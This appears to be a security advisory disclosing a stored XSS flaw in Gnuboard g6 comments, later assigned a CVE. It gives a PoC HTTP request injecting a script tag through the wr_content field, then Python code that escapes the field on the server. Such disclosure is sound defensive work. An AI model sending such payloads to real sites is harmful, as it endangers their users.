
Stored XSS vulnerability due to HTML Escape unprocessed when writing comments

· 2 years ago · 543 · 1
Hello.

Currently, there is a vulnerability that allows a `<script>` tag to be written into Gnuboard g6 comments.

### [Name of affected Product]
gnuboard 6

### [Affected version]

https://github.com/gnuboard/g6/commit/58c737a263ac0c523592fd87ff71b9e3c07d7cf5

### [Vulnerability Type]
* Stored XSS

### [Root Cause]
* While writing a reply on a post, the `wr_content` parameter is not sanitized for HTML tags, so posting a reply that contains an HTML tag causes a Stored XSS.

### [Attack Vectors]

https://github.com/gnuboard/g6/assets/25397908/1165cc3e-b16a-402f-8438-731aa686d187

As shown above, the web browser normally prevents HTML tags from being entered, but if you manipulate the HTTP request with a proxy tool such as Burp Suite, or send the request directly with the requests library to create a comment, the HTML tags are stored and rendered as they are.

This enables Stored XSS attacks by injecting the tag `<script>`.

Below is a PoC web request.

```http
POST /board/write_comment_update/free HTTP/1.1
Host: 127.0.0.1:8000
Content-Length: 120
Cache-Control: max-age=0
sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1:8000
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.199 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1:8000/board/free/9
Accept-Encoding: gzip, deflate, br
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: ck_visit_ip=127.0.0.1; session=eyJpc19tb2JpbGUiOiBmYWxzZSwgInNzX3Rva2VuIjogImNhYjNmNTJlMWJiMGM4MTI5YjJkZWFhOThjNzU1NzNiIiwgInNzX3dyaXRlX3RpbWUiOiAiMjAyNC0wMS0xNyAxNzoyOToxMyIsICJzc19tYl9pZCI6ICJhZG1pbiIsICJzc19tYl9rZXkiOiAiYjQ1NDlkNDUyY2I5OGE4ZTQ0NjgxMjRlMDljN2U2ZDIifQ==.Zahxzw.f63f-VyyFl0nkkcr7ZReYkGnMm4
Connection: close

w=c&bo_table=free&wr_id=9&comment_id=&sca=&sfl=&stx=&spt=&page=&token=cab3f52e1bb0c8129b2deaa98c75573b&wr_content=<script>alert(1)</script>
```
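The browser-side restriction the report mentions is bypassable, so the check has to live on the server. The following is an added example (not Gnuboard g6 code) of server-side handling for the `wr_content` field: it parses the form body from the PoC above, flags tag-like input for logging, and HTML-escapes the value before it is stored so that every later render shows the payload as text. The function and variable names are assumptions for this illustration.

```python
"""Server-side handling of the wr_content comment field (added example)."""
import html
import re
from urllib.parse import parse_qs

# Matches anything that looks like an HTML tag; used only to flag raw input.
TAG_RE = re.compile(r"<\s*/?\s*[a-zA-Z][^>]*>")

# Constructed sample: the form body from the PoC request in the report.
POC_BODY = ("w=c&bo_table=free&wr_id=9&comment_id=&sca=&sfl=&stx=&spt=&page="
            "&token=cab3f52e1bb0c8129b2deaa98c75573b"
            "&wr_content=<script>alert(1)</script>")


def contains_markup(text: str) -> bool:
    """True if the raw comment contains something tag-like (an attempt worth logging)."""
    return TAG_RE.search(text) is not None


def escape_comment(text: str) -> str:
    """Escape the characters that let text break out of an HTML text node
    or attribute value: & < > " and '."""
    return html.escape(text, quote=True)


def process_comment_request(body: str) -> dict:
    """Parse a urlencoded comment body and return what the server should store.

    Escaping happens before storage, so a template that forgets to escape
    still cannot emit the raw tag."""
    form = parse_qs(body, keep_blank_values=True)
    raw = form.get("wr_content", [""])[0]
    return {
        "wr_id": form.get("wr_id", [""])[0],
        "flagged": contains_markup(raw),
        "wr_content": escape_comment(raw),
    }


def render_comment(stored: str) -> str:
    """Place the stored (already escaped) value into the comment markup."""
    return f'<div class="comment">{stored}</div>'


if __name__ == "__main__":
    result = process_comment_request(POC_BODY)
    print(result["flagged"], render_comment(result["wr_content"]))
```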

1 comment

2 years ago
This vulnerability has been assigned [CVE-2024-24156](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-24156)